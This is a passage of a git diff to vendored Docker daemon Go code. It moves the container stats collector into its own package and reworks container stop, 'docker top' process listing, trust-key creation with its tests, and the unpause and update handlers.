+ publisher.Close() + delete(s.publishers, c) + } + s.m.Unlock() +} + +// Unsubscribe removes a specific subscriber from receiving updates for a container's stats. 
+func (s *Collector) Unsubscribe(c *container.Container, ch chan interface{}) { + s.m.Lock() + publisher := s.publishers[c] + if publisher != nil { + publisher.Evict(ch) + if publisher.Len() == 0 { + delete(s.publishers, c) + } + } + s.m.Unlock() +} + +// Run starts the collectors and will indefinitely collect stats from the supervisor +func (s *Collector) Run() { + type publishersPair struct { + container *container.Container + publisher *pubsub.Publisher + } + // we cannot determine the capacity here. + // it will grow enough in first iteration + var pairs []publishersPair + + for { + // Put sleep at the start so that it will always be hit, + // preventing a tight loop if no stats are collected. + time.Sleep(s.interval) + + // it does not make sense in the first iteration, + // but saves allocations in further iterations + pairs = pairs[:0] + + s.m.Lock() + for container, publisher := range s.publishers { + // copy pointers here to release the lock ASAP + pairs = append(pairs, publishersPair{container, publisher}) + } + s.m.Unlock() + if len(pairs) == 0 { + continue + } + + onlineCPUs, err := s.getNumberOnlineCPUs() + if err != nil { + logrus.Errorf("collecting system online cpu count: %v", err) + continue + } + + for _, pair := range pairs { + stats, err := s.supervisor.GetContainerStats(pair.container) + + switch err.(type) { + case nil: + // Sample system CPU usage close to container usage to avoid + // noise in metric calculations. 
+ systemUsage, err := s.getSystemCPUUsage() + if err != nil { + logrus.WithError(err).WithField("container_id", pair.container.ID).Errorf("collecting system cpu usage") + continue + } + + // FIXME: move to containerd on Linux (not Windows) + stats.CPUStats.SystemUsage = systemUsage + stats.CPUStats.OnlineCPUs = onlineCPUs + + pair.publisher.Publish(*stats) + + case notRunningErr, notFoundErr: + // publish empty stats containing only name and ID if not running or not found + pair.publisher.Publish(types.StatsJSON{ + Name: pair.container.Name, + ID: pair.container.ID, + }) + + default: + logrus.Errorf("collecting stats for %s: %v", pair.container.ID, err) + } + } + } +} + +type notRunningErr interface { + error + Conflict() +} + +type notFoundErr interface { + error + NotFound() +} diff --git a/vendor/github.com/docker/docker/daemon/stats_collector_unix.go b/vendor/github.com/docker/docker/daemon/stats/collector_unix.go similarity index 69% rename from vendor/github.com/docker/docker/daemon/stats_collector_unix.go rename to vendor/github.com/docker/docker/daemon/stats/collector_unix.go index 0fcc9c5828..2480aceb51 100644 --- a/vendor/github.com/docker/docker/daemon/stats_collector_unix.go +++ b/vendor/github.com/docker/docker/daemon/stats/collector_unix.go @@ -1,6 +1,6 @@ -// +build !windows,!solaris +// +build !windows -package daemon +package stats // import "github.com/docker/docker/daemon/stats" import ( "fmt" @@ -8,18 +8,18 @@ import ( "strconv" "strings" - sysinfo "github.com/docker/docker/pkg/system" "github.com/opencontainers/runc/libcontainer/system" ) +/* +#include +*/ +import "C" + // platformNewStatsCollector performs platform specific initialisation of the -// statsCollector structure. -func platformNewStatsCollector(s *statsCollector) { +// Collector structure. 
+func platformNewStatsCollector(s *Collector) { s.clockTicksPerSecond = uint64(system.GetClockTicks()) - meminfo, err := sysinfo.ReadMemInfo() - if err == nil && meminfo.MemTotal > 0 { - s.machineMemory = uint64(meminfo.MemTotal) - } } const nanoSecondsPerSecond = 1e9 @@ -32,7 +32,7 @@ const nanoSecondsPerSecond = 1e9 // statistics line and then sums up the first seven fields // provided. See `man 5 proc` for details on specific field // information. -func (s *statsCollector) getSystemCPUUsage() (uint64, error) { +func (s *Collector) getSystemCPUUsage() (uint64, error) { var line string f, err := os.Open("/proc/stat") if err != nil { @@ -69,3 +69,15 @@ func (s *statsCollector) getSystemCPUUsage() (uint64, error) { } return 0, fmt.Errorf("invalid stat format. Error trying to parse the '/proc/stat' file") } + +func (s *Collector) getNumberOnlineCPUs() (uint32, error) { + i, err := C.sysconf(C._SC_NPROCESSORS_ONLN) + // According to POSIX - errno is undefined after successful + // sysconf, and can be non-zero in several cases, so look for + // error in returned value not in errno. + // (https://sourceware.org/bugzilla/show_bug.cgi?id=21536) + if i == -1 { + return 0, err + } + return uint32(i), nil +} diff --git a/vendor/github.com/docker/docker/daemon/stats/collector_windows.go b/vendor/github.com/docker/docker/daemon/stats/collector_windows.go new file mode 100644 index 0000000000..018e9065f1 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/stats/collector_windows.go @@ -0,0 +1,17 @@ +package stats // import "github.com/docker/docker/daemon/stats" + +// platformNewStatsCollector performs platform specific initialisation of the +// Collector structure. This is a no-op on Windows. +func platformNewStatsCollector(s *Collector) { +} + +// getSystemCPUUsage returns the host system's cpu usage in +// nanoseconds. An error is returned if the format of the underlying +// file does not match. This is a no-op on Windows. 
+func (s *Collector) getSystemCPUUsage() (uint64, error) { + return 0, nil +} + +func (s *Collector) getNumberOnlineCPUs() (uint32, error) { + return 0, nil +} diff --git a/vendor/github.com/docker/docker/daemon/stats_collector.go b/vendor/github.com/docker/docker/daemon/stats_collector.go index dc6825e705..0490b2ea15 100644 --- a/vendor/github.com/docker/docker/daemon/stats_collector.go +++ b/vendor/github.com/docker/docker/daemon/stats_collector.go @@ -1,132 +1,26 @@ -// +build !solaris - -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "bufio" - "sync" + "runtime" "time" - "github.com/Sirupsen/logrus" - "github.com/docker/docker/api/types" - "github.com/docker/docker/container" - "github.com/docker/docker/pkg/pubsub" + "github.com/docker/docker/daemon/stats" + "github.com/docker/docker/pkg/system" ) -type statsSupervisor interface { - // GetContainerStats collects all the stats related to a container - GetContainerStats(container *container.Container) (*types.StatsJSON, error) -} - // newStatsCollector returns a new statsCollector that collections // stats for a registered container at the specified interval. // The collector allows non-running containers to be added // and will start processing stats when they are started. -func (daemon *Daemon) newStatsCollector(interval time.Duration) *statsCollector { - s := &statsCollector{ - interval: interval, - supervisor: daemon, - publishers: make(map[*container.Container]*pubsub.Publisher), - bufReader: bufio.NewReaderSize(nil, 128), - } - platformNewStatsCollector(s) - go s.run() - return s -} - -// statsCollector manages and provides container resource stats -type statsCollector struct { - m sync.Mutex - supervisor statsSupervisor - interval time.Duration - publishers map[*container.Container]*pubsub.Publisher - bufReader *bufio.Reader - - // The following fields are not set on Windows currently. 
- clockTicksPerSecond uint64 - machineMemory uint64 -} - -// collect registers the container with the collector and adds it to -// the event loop for collection on the specified interval returning -// a channel for the subscriber to receive on. -func (s *statsCollector) collect(c *container.Container) chan interface{} { - s.m.Lock() - defer s.m.Unlock() - publisher, exists := s.publishers[c] - if !exists { - publisher = pubsub.NewPublisher(100*time.Millisecond, 1024) - s.publishers[c] = publisher - } - return publisher.Subscribe() -} - -// stopCollection closes the channels for all subscribers and removes -// the container from metrics collection. -func (s *statsCollector) stopCollection(c *container.Container) { - s.m.Lock() - if publisher, exists := s.publishers[c]; exists { - publisher.Close() - delete(s.publishers, c) - } - s.m.Unlock() -} - -// unsubscribe removes a specific subscriber from receiving updates for a container's stats. -func (s *statsCollector) unsubscribe(c *container.Container, ch chan interface{}) { - s.m.Lock() - publisher := s.publishers[c] - if publisher != nil { - publisher.Evict(ch) - if publisher.Len() == 0 { - delete(s.publishers, c) - } - } - s.m.Unlock() -} - -func (s *statsCollector) run() { - type publishersPair struct { - container *container.Container - publisher *pubsub.Publisher - } - // we cannot determine the capacity here. 
- // it will grow enough in first iteration - var pairs []publishersPair - - for range time.Tick(s.interval) { - // it does not make sense in the first iteration, - // but saves allocations in further iterations - pairs = pairs[:0] - - s.m.Lock() - for container, publisher := range s.publishers { - // copy pointers here to release the lock ASAP - pairs = append(pairs, publishersPair{container, publisher}) - } - s.m.Unlock() - if len(pairs) == 0 { - continue - } - - systemUsage, err := s.getSystemCPUUsage() - if err != nil { - logrus.Errorf("collecting system cpu usage: %v", err) - continue - } - - for _, pair := range pairs { - stats, err := s.supervisor.GetContainerStats(pair.container) - if err != nil { - if _, ok := err.(errNotRunning); !ok { - logrus.Errorf("collecting stats for %s: %v", pair.container.ID, err) - } - continue - } - // FIXME: move to containerd on Linux (not Windows) - stats.CPUStats.SystemUsage = systemUsage - - pair.publisher.Publish(*stats) +func (daemon *Daemon) newStatsCollector(interval time.Duration) *stats.Collector { + // FIXME(vdemeester) move this elsewhere + if runtime.GOOS == "linux" { + meminfo, err := system.ReadMemInfo() + if err == nil && meminfo.MemTotal > 0 { + daemon.machineMemory = uint64(meminfo.MemTotal) } } + s := stats.NewCollector(daemon, interval) + go s.Run() + return s } diff --git a/vendor/github.com/docker/docker/daemon/stats_collector_solaris.go b/vendor/github.com/docker/docker/daemon/stats_collector_solaris.go deleted file mode 100644 index 9cf9f0a94e..0000000000 --- a/vendor/github.com/docker/docker/daemon/stats_collector_solaris.go +++ /dev/null @@ -1,34 +0,0 @@ -package daemon - -import ( - "github.com/docker/docker/container" - "time" -) - -// newStatsCollector returns a new statsCollector for collection stats -// for a registered container at the specified interval. The collector allows -// non-running containers to be added and will start processing stats when -// they are started. 
-func (daemon *Daemon) newStatsCollector(interval time.Duration) *statsCollector { - return &statsCollector{} -} - -// statsCollector manages and provides container resource stats -type statsCollector struct { -} - -// collect registers the container with the collector and adds it to -// the event loop for collection on the specified interval returning -// a channel for the subscriber to receive on. -func (s *statsCollector) collect(c *container.Container) chan interface{} { - return nil -} - -// stopCollection closes the channels for all subscribers and removes -// the container from metrics collection. -func (s *statsCollector) stopCollection(c *container.Container) { -} - -// unsubscribe removes a specific subscriber from receiving updates for a container's stats. -func (s *statsCollector) unsubscribe(c *container.Container, ch chan interface{}) { -} diff --git a/vendor/github.com/docker/docker/daemon/stats_collector_windows.go b/vendor/github.com/docker/docker/daemon/stats_collector_windows.go deleted file mode 100644 index 41731b9c14..0000000000 --- a/vendor/github.com/docker/docker/daemon/stats_collector_windows.go +++ /dev/null @@ -1,15 +0,0 @@ -// +build windows - -package daemon - -// platformNewStatsCollector performs platform specific initialisation of the -// statsCollector structure. This is a no-op on Windows. -func platformNewStatsCollector(s *statsCollector) { -} - -// getSystemCPUUsage returns the host system's cpu usage in -// nanoseconds. An error is returned if the format of the underlying -// file does not match. This is a no-op on Windows. 
-func (s *statsCollector) getSystemCPUUsage() (uint64, error) { - return 0, nil -} diff --git a/vendor/github.com/docker/docker/daemon/stats_unix.go b/vendor/github.com/docker/docker/daemon/stats_unix.go index d875607b3a..ee78ca688b 100644 --- a/vendor/github.com/docker/docker/daemon/stats_unix.go +++ b/vendor/github.com/docker/docker/daemon/stats_unix.go @@ -1,12 +1,11 @@ // +build !windows -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "fmt" - "github.com/docker/docker/api/types" "github.com/docker/docker/container" + "github.com/pkg/errors" ) // Resolve Network SandboxID in case the container reuse another container's network stack @@ -16,7 +15,7 @@ func (daemon *Daemon) getNetworkSandboxID(c *container.Container) (string, error containerID := curr.HostConfig.NetworkMode.ConnectedContainer() connected, err := daemon.GetContainer(containerID) if err != nil { - return "", fmt.Errorf("Could not get container for %s", containerID) + return "", errors.Wrapf(err, "Could not get container for %s", containerID) } curr = connected } diff --git a/vendor/github.com/docker/docker/daemon/stats_windows.go b/vendor/github.com/docker/docker/daemon/stats_windows.go index f8e6f6f84a..0306332b48 100644 --- a/vendor/github.com/docker/docker/daemon/stats_windows.go +++ b/vendor/github.com/docker/docker/daemon/stats_windows.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "github.com/docker/docker/api/types" diff --git a/vendor/github.com/docker/docker/daemon/stop.go b/vendor/github.com/docker/docker/daemon/stop.go index aa7b3820c8..c3ac09056a 100644 --- a/vendor/github.com/docker/docker/daemon/stop.go +++ b/vendor/github.com/docker/docker/daemon/stop.go @@ -1,58 +1,53 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "fmt" - "net/http" + "context" "time" - "github.com/Sirupsen/logrus" - "github.com/docker/docker/api/errors" - 
"github.com/docker/docker/container" + containerpkg "github.com/docker/docker/container" + "github.com/docker/docker/errdefs" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) -// ContainerStop looks for the given container and terminates it, -// waiting the given number of seconds before forcefully killing the -// container. If a negative number of seconds is given, ContainerStop -// will wait for a graceful termination. An error is returned if the -// container is not found, is already stopped, or if there is a -// problem stopping the container. -func (daemon *Daemon) ContainerStop(name string, seconds *int) error { +// ContainerStop looks for the given container and stops it. +// In case the container fails to stop gracefully within a time duration +// specified by the timeout argument, in seconds, it is forcefully +// terminated (killed). +// +// If the timeout is nil, the container's StopTimeout value is used, if set, +// otherwise the engine default. A negative timeout value can be specified, +// meaning no timeout, i.e. no forceful termination is performed. 
+func (daemon *Daemon) ContainerStop(name string, timeout *int) error { container, err := daemon.GetContainer(name) if err != nil { return err } if !container.IsRunning() { - err := fmt.Errorf("Container %s is already stopped", name) - return errors.NewErrorWithStatusCode(err, http.StatusNotModified) + return containerNotModifiedError{running: false} } - if seconds == nil { + if timeout == nil { stopTimeout := container.StopTimeout() - seconds = &stopTimeout + timeout = &stopTimeout } - if err := daemon.containerStop(container, *seconds); err != nil { - return fmt.Errorf("Cannot stop container %s: %v", name, err) + if err := daemon.containerStop(container, *timeout); err != nil { + return errdefs.System(errors.Wrapf(err, "cannot stop container: %s", name)) } return nil } -// containerStop halts a container by sending a stop signal, waiting for the given -// duration in seconds, and then calling SIGKILL and waiting for the -// process to exit. If a negative duration is given, Stop will wait -// for the initial signal forever. If the container is not running Stop returns -// immediately. -func (daemon *Daemon) containerStop(container *container.Container, seconds int) error { +// containerStop sends a stop signal, waits, sends a kill signal. +func (daemon *Daemon) containerStop(container *containerpkg.Container, seconds int) error { if !container.IsRunning() { return nil } - daemon.stopHealthchecks(container) - stopSignal := container.StopSignal() // 1. Send a stop signal if err := daemon.killPossiblyDeadProcess(container, stopSignal); err != nil { // While normally we might "return err" here we're not going to // because if we can't stop the container by this point then - // its probably because its already stopped. Meaning, between + // it's probably because it's already stopped. Meaning, between // the time of the IsRunning() call above and now it stopped. 
// Also, since the err return will be environment specific we can't // look for any particular (common) error that would indicate @@ -60,7 +55,10 @@ func (daemon *Daemon) containerStop(container *container.Container, seconds int) // So, instead we'll give it up to 2 more seconds to complete and if // by that time the container is still running, then the error // we got is probably valid and so we force kill it. - if _, err := container.WaitStop(2 * time.Second); err != nil { + ctx, cancel := context.WithTimeout(context.Background(), 2*time.Second) + defer cancel() + + if status := <-container.Wait(ctx, containerpkg.WaitConditionNotRunning); status.Err() != nil { logrus.Infof("Container failed to stop after sending signal %d to the process, force killing", stopSignal) if err := daemon.killPossiblyDeadProcess(container, 9); err != nil { return err @@ -69,11 +67,19 @@ func (daemon *Daemon) containerStop(container *container.Container, seconds int) } // 2. Wait for the process to exit on its own - if _, err := container.WaitStop(time.Duration(seconds) * time.Second); err != nil { + ctx := context.Background() + if seconds >= 0 { + var cancel context.CancelFunc + ctx, cancel = context.WithTimeout(ctx, time.Duration(seconds)*time.Second) + defer cancel() + } + + if status := <-container.Wait(ctx, containerpkg.WaitConditionNotRunning); status.Err() != nil { logrus.Infof("Container %v failed to exit within %d seconds of signal %d - using the force", container.ID, seconds, stopSignal) // 3. If it doesn't, then send SIGKILL if err := daemon.Kill(container); err != nil { - container.WaitStop(-1 * time.Second) + // Wait without a timeout, ignore result. 
+ <-container.Wait(context.Background(), containerpkg.WaitConditionNotRunning) logrus.Warn(err) // Don't return error because we only care that container is stopped, not what function stopped it } } diff --git a/vendor/github.com/docker/docker/api/fixtures/keyfile b/vendor/github.com/docker/docker/daemon/testdata/keyfile similarity index 100% rename from vendor/github.com/docker/docker/api/fixtures/keyfile rename to vendor/github.com/docker/docker/daemon/testdata/keyfile diff --git a/vendor/github.com/docker/docker/daemon/top_unix.go b/vendor/github.com/docker/docker/daemon/top_unix.go index 7fb81d0148..99ca56f0f4 100644 --- a/vendor/github.com/docker/docker/daemon/top_unix.go +++ b/vendor/github.com/docker/docker/daemon/top_unix.go @@ -1,21 +1,26 @@ //+build !windows -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "bytes" + "context" "fmt" "os/exec" "regexp" "strconv" "strings" - "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/errdefs" + "github.com/pkg/errors" ) func validatePSArgs(psArgs string) error { // NOTE: \\s does not detect unicode whitespaces. // So we use fieldsASCII instead of strings.Fields in parsePSOutput. 
// See https://github.com/docker/docker/pull/24358 + // nolint: gosimple re := regexp.MustCompile("\\s+([^\\s]*)=\\s*(PID[^\\s]*)") for _, group := range re.FindAllStringSubmatch(psArgs, -1) { if len(group) >= 3 { @@ -41,8 +46,25 @@ func fieldsASCII(s string) []string { return strings.FieldsFunc(s, fn) } -func parsePSOutput(output []byte, pids []int) (*types.ContainerProcessList, error) { - procList := &types.ContainerProcessList{} +func appendProcess2ProcList(procList *container.ContainerTopOKBody, fields []string) { + // Make sure number of fields equals number of header titles + // merging "overhanging" fields + process := fields[:len(procList.Titles)-1] + process = append(process, strings.Join(fields[len(procList.Titles)-1:], " ")) + procList.Processes = append(procList.Processes, process) +} + +func hasPid(procs []uint32, pid int) bool { + for _, p := range procs { + if int(p) == pid { + return true + } + } + return false +} + +func parsePSOutput(output []byte, procs []uint32) (*container.ContainerTopOKBody, error) { + procList := &container.ContainerTopOKBody{} lines := strings.Split(string(output), "\n") procList.Titles = fieldsASCII(lines[0]) @@ -51,6 +73,7 @@ func parsePSOutput(output []byte, pids []int) (*types.ContainerProcessList, erro for i, name := range procList.Titles { if name == "PID" { pidIndex = i + break } } if pidIndex == -1 { @@ -58,35 +81,61 @@ func parsePSOutput(output []byte, pids []int) (*types.ContainerProcessList, erro } // loop through the output and extract the PID from each line + // fixing #30580, be able to display thread line also when "m" option used + // in "docker top" client command + preContainedPidFlag := false for _, line := range lines[1:] { if len(line) == 0 { continue } fields := fieldsASCII(line) - p, err := strconv.Atoi(fields[pidIndex]) + + var ( + p int + err error + ) + + if fields[pidIndex] == "-" { + if preContainedPidFlag { + appendProcess2ProcList(procList, fields) + } + continue + } + p, err = 
strconv.Atoi(fields[pidIndex]) if err != nil { return nil, fmt.Errorf("Unexpected pid '%s': %s", fields[pidIndex], err) } - for _, pid := range pids { - if pid == p { - // Make sure number of fields equals number of header titles - // merging "overhanging" fields - process := fields[:len(procList.Titles)-1] - process = append(process, strings.Join(fields[len(procList.Titles)-1:], " ")) - procList.Processes = append(procList.Processes, process) - } + if hasPid(procs, p) { + preContainedPidFlag = true + appendProcess2ProcList(procList, fields) + continue } + preContainedPidFlag = false } return procList, nil } +// psPidsArg converts a slice of PIDs to a string consisting +// of comma-separated list of PIDs prepended by "-q". +// For example, psPidsArg([]uint32{1,2,3}) returns "-q1,2,3". +func psPidsArg(pids []uint32) string { + b := []byte{'-', 'q'} + for i, p := range pids { + b = strconv.AppendUint(b, uint64(p), 10) + if i < len(pids)-1 { + b = append(b, ',') + } + } + return string(b) +} + // ContainerTop lists the processes running inside of the given // container by calling ps with the given args, or with the flags // "-ef" if no args are given. An error is returned if the container // is not found, or is not running, or if there are any problems // running ps, or parsing the output. 
-func (daemon *Daemon) ContainerTop(name string, psArgs string) (*types.ContainerProcessList, error) { +func (daemon *Daemon) ContainerTop(name string, psArgs string) (*container.ContainerTopOKBody, error) { if psArgs == "" { psArgs = "-ef" } @@ -101,23 +150,37 @@ func (daemon *Daemon) ContainerTop(name string, psArgs string) (*types.Container } if !container.IsRunning() { - return nil, errNotRunning{container.ID} + return nil, errNotRunning(container.ID) } if container.IsRestarting() { return nil, errContainerIsRestarting(container.ID) } - pids, err := daemon.containerd.GetPidsForContainer(container.ID) + procs, err := daemon.containerd.ListPids(context.Background(), container.ID) if err != nil { return nil, err } - output, err := exec.Command("ps", strings.Split(psArgs, " ")...).Output() + args := strings.Split(psArgs, " ") + pids := psPidsArg(procs) + output, err := exec.Command("ps", append(args, pids)...).Output() if err != nil { - return nil, fmt.Errorf("Error running ps: %v", err) + // some ps options (such as f) can't be used together with q, + // so retry without it + output, err = exec.Command("ps", args...).Output() + if err != nil { + if ee, ok := err.(*exec.ExitError); ok { + // first line of stderr shows why ps failed + line := bytes.SplitN(ee.Stderr, []byte{'\n'}, 2) + if len(line) > 0 && len(line[0]) > 0 { + err = errors.New(string(line[0])) + } + } + return nil, errdefs.System(errors.Wrap(err, "ps")) + } } - procList, err := parsePSOutput(output, pids) + procList, err := parsePSOutput(output, procs) if err != nil { return nil, err } diff --git a/vendor/github.com/docker/docker/daemon/top_unix_test.go b/vendor/github.com/docker/docker/daemon/top_unix_test.go index 269ab6e947..41cb3e1cd9 100644 --- a/vendor/github.com/docker/docker/daemon/top_unix_test.go +++ b/vendor/github.com/docker/docker/daemon/top_unix_test.go @@ -1,6 +1,6 @@ //+build !windows -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "testing" @@ 
-36,31 +36,34 @@ func TestContainerTopValidatePSArgs(t *testing.T) { func TestContainerTopParsePSOutput(t *testing.T) { tests := []struct { output []byte - pids []int + pids []uint32 errExpected bool }{ {[]byte(` PID COMMAND 42 foo 43 bar + - - 100 baz -`), []int{42, 43}, false}, +`), []uint32{42, 43}, false}, {[]byte(` UID COMMAND 42 foo 43 bar + - - 100 baz -`), []int{42, 43}, true}, +`), []uint32{42, 43}, true}, // unicode space (U+2003, 0xe2 0x80 0x83) {[]byte(` PID COMMAND 42 foo 43 bar + - - 100 baz -`), []int{42, 43}, true}, +`), []uint32{42, 43}, true}, // the first space is U+2003, the second one is ascii. {[]byte(` PID COMMAND 42 foo 43 bar 100 baz -`), []int{42, 43}, true}, +`), []uint32{42, 43}, true}, } for _, f := range tests { diff --git a/vendor/github.com/docker/docker/daemon/top_windows.go b/vendor/github.com/docker/docker/daemon/top_windows.go index 3dd8ead468..1b3f843962 100644 --- a/vendor/github.com/docker/docker/daemon/top_windows.go +++ b/vendor/github.com/docker/docker/daemon/top_windows.go @@ -1,11 +1,12 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "errors" "fmt" "time" - "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" "github.com/docker/go-units" ) @@ -23,7 +24,7 @@ import ( // task manager does and use the private working set as the memory counter. // We could return more info for those who really understand how memory // management works in Windows if we introduced a "raw" stats (above). 
-func (daemon *Daemon) ContainerTop(name string, psArgs string) (*types.ContainerProcessList, error) { +func (daemon *Daemon) ContainerTop(name string, psArgs string) (*containertypes.ContainerTopOKBody, error) { // It's not at all an equivalent to linux 'ps' on Windows if psArgs != "" { return nil, errors.New("Windows does not support arguments to top") @@ -34,11 +35,19 @@ func (daemon *Daemon) ContainerTop(name string, psArgs string) (*types.Container return nil, err } - s, err := daemon.containerd.Summary(container.ID) + if !container.IsRunning() { + return nil, errNotRunning(container.ID) + } + + if container.IsRestarting() { + return nil, errContainerIsRestarting(container.ID) + } + + s, err := daemon.containerd.Summary(context.Background(), container.ID) if err != nil { return nil, err } - procList := &types.ContainerProcessList{} + procList := &containertypes.ContainerTopOKBody{} procList.Titles = []string{"Name", "PID", "CPU", "Private Working Set"} for _, j := range s { @@ -49,5 +58,6 @@ func (daemon *Daemon) ContainerTop(name string, psArgs string) (*types.Container fmt.Sprintf("%02d:%02d:%02d.%03d", int(d.Hours()), int(d.Minutes())%60, int(d.Seconds())%60, int(d.Nanoseconds()/1000000)%1000), units.HumanSize(float64(j.MemoryWorkingSetPrivateBytes))}) } + return procList, nil } diff --git a/vendor/github.com/docker/docker/daemon/trustkey.go b/vendor/github.com/docker/docker/daemon/trustkey.go new file mode 100644 index 0000000000..bf00b6a3a0 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/trustkey.go @@ -0,0 +1,57 @@ +package daemon // import "github.com/docker/docker/daemon" + +import ( + "encoding/json" + "encoding/pem" + "fmt" + "os" + "path/filepath" + + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/system" + "github.com/docker/libtrust" +) + +// LoadOrCreateTrustKey attempts to load the libtrust key at the given path, +// otherwise generates a new one +// TODO: this should use more of libtrust.LoadOrCreateTrustKey 
which may need +// a refactor or this function to be moved into libtrust +func loadOrCreateTrustKey(trustKeyPath string) (libtrust.PrivateKey, error) { + err := system.MkdirAll(filepath.Dir(trustKeyPath), 0700, "") + if err != nil { + return nil, err + } + trustKey, err := libtrust.LoadKeyFile(trustKeyPath) + if err == libtrust.ErrKeyFileDoesNotExist { + trustKey, err = libtrust.GenerateECP256PrivateKey() + if err != nil { + return nil, fmt.Errorf("Error generating key: %s", err) + } + encodedKey, err := serializePrivateKey(trustKey, filepath.Ext(trustKeyPath)) + if err != nil { + return nil, fmt.Errorf("Error serializing key: %s", err) + } + if err := ioutils.AtomicWriteFile(trustKeyPath, encodedKey, os.FileMode(0600)); err != nil { + return nil, fmt.Errorf("Error saving key file: %s", err) + } + } else if err != nil { + return nil, fmt.Errorf("Error loading key file %s: %s", trustKeyPath, err) + } + return trustKey, nil +} + +func serializePrivateKey(key libtrust.PrivateKey, ext string) (encoded []byte, err error) { + if ext == ".json" || ext == ".jwk" { + encoded, err = json.Marshal(key) + if err != nil { + return nil, fmt.Errorf("unable to encode private key JWK: %s", err) + } + } else { + pemBlock, err := key.PEMBlock() + if err != nil { + return nil, fmt.Errorf("unable to encode private key PEM: %s", err) + } + encoded = pem.EncodeToMemory(pemBlock) + } + return +} diff --git a/vendor/github.com/docker/docker/daemon/trustkey_test.go b/vendor/github.com/docker/docker/daemon/trustkey_test.go new file mode 100644 index 0000000000..e49e76aa3e --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/trustkey_test.go @@ -0,0 +1,71 @@ +package daemon // import "github.com/docker/docker/daemon" + +import ( + "io/ioutil" + "os" + "path/filepath" + "testing" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/fs" +) + +// LoadOrCreateTrustKey +func TestLoadOrCreateTrustKeyInvalidKeyFile(t *testing.T) { + tmpKeyFolderPath, err := 
ioutil.TempDir("", "api-trustkey-test") + assert.NilError(t, err) + defer os.RemoveAll(tmpKeyFolderPath) + + tmpKeyFile, err := ioutil.TempFile(tmpKeyFolderPath, "keyfile") + assert.NilError(t, err) + + _, err = loadOrCreateTrustKey(tmpKeyFile.Name()) + assert.Check(t, is.ErrorContains(err, "Error loading key file")) +} + +func TestLoadOrCreateTrustKeyCreateKeyWhenFileDoesNotExist(t *testing.T) { + tmpKeyFolderPath := fs.NewDir(t, "api-trustkey-test") + defer tmpKeyFolderPath.Remove() + + // Without the need to create the folder hierarchy + tmpKeyFile := tmpKeyFolderPath.Join("keyfile") + + key, err := loadOrCreateTrustKey(tmpKeyFile) + assert.NilError(t, err) + assert.Check(t, key != nil) + + _, err = os.Stat(tmpKeyFile) + assert.NilError(t, err, "key file doesn't exist") +} + +func TestLoadOrCreateTrustKeyCreateKeyWhenDirectoryDoesNotExist(t *testing.T) { + tmpKeyFolderPath := fs.NewDir(t, "api-trustkey-test") + defer tmpKeyFolderPath.Remove() + tmpKeyFile := tmpKeyFolderPath.Join("folder/hierarchy/keyfile") + + key, err := loadOrCreateTrustKey(tmpKeyFile) + assert.NilError(t, err) + assert.Check(t, key != nil) + + _, err = os.Stat(tmpKeyFile) + assert.NilError(t, err, "key file doesn't exist") +} + +func TestLoadOrCreateTrustKeyCreateKeyNoPath(t *testing.T) { + defer os.Remove("keyfile") + key, err := loadOrCreateTrustKey("keyfile") + assert.NilError(t, err) + assert.Check(t, key != nil) + + _, err = os.Stat("keyfile") + assert.NilError(t, err, "key file doesn't exist") +} + +func TestLoadOrCreateTrustKeyLoadValidKey(t *testing.T) { + tmpKeyFile := filepath.Join("testdata", "keyfile") + key, err := loadOrCreateTrustKey(tmpKeyFile) + assert.NilError(t, err) + expected := "AWX2:I27X:WQFX:IOMK:CNAK:O7PW:VYNB:ZLKC:CVAE:YJP2:SI4A:XXAY" + assert.Check(t, is.Contains(key.String(), expected)) +} diff --git a/vendor/github.com/docker/docker/daemon/unpause.go b/vendor/github.com/docker/docker/daemon/unpause.go index e66b3868dc..9061d50a16 100644 --- 
a/vendor/github.com/docker/docker/daemon/unpause.go +++ b/vendor/github.com/docker/docker/daemon/unpause.go @@ -1,9 +1,11 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "fmt" "github.com/docker/docker/container" + "github.com/sirupsen/logrus" ) // ContainerUnpause unpauses a container @@ -12,12 +14,7 @@ func (daemon *Daemon) ContainerUnpause(name string) error { if err != nil { return err } - - if err := daemon.containerUnpause(container); err != nil { - return err - } - - return nil + return daemon.containerUnpause(container) } // containerUnpause resumes the container execution after the container is paused. @@ -30,9 +27,18 @@ func (daemon *Daemon) containerUnpause(container *container.Container) error { return fmt.Errorf("Container %s is not paused", container.ID) } - if err := daemon.containerd.Resume(container.ID); err != nil { + if err := daemon.containerd.Resume(context.Background(), container.ID); err != nil { return fmt.Errorf("Cannot unpause container %s: %s", container.ID, err) } + container.Paused = false + daemon.setStateCounter(container) + daemon.updateHealthMonitor(container) + daemon.LogContainerEvent(container, "unpause") + + if err := container.CheckpointTo(daemon.containersReplica); err != nil { + logrus.WithError(err).Warnf("could not save container to disk") + } + return nil } diff --git a/vendor/github.com/docker/docker/daemon/update.go b/vendor/github.com/docker/docker/daemon/update.go index 6e26eeb96a..0ebb139d3d 100644 --- a/vendor/github.com/docker/docker/daemon/update.go +++ b/vendor/github.com/docker/docker/daemon/update.go @@ -1,20 +1,28 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "fmt" "github.com/docker/docker/api/types/container" + "github.com/docker/docker/errdefs" + "github.com/pkg/errors" ) // ContainerUpdate updates configuration of the container func (daemon *Daemon) ContainerUpdate(name string, hostConfig 
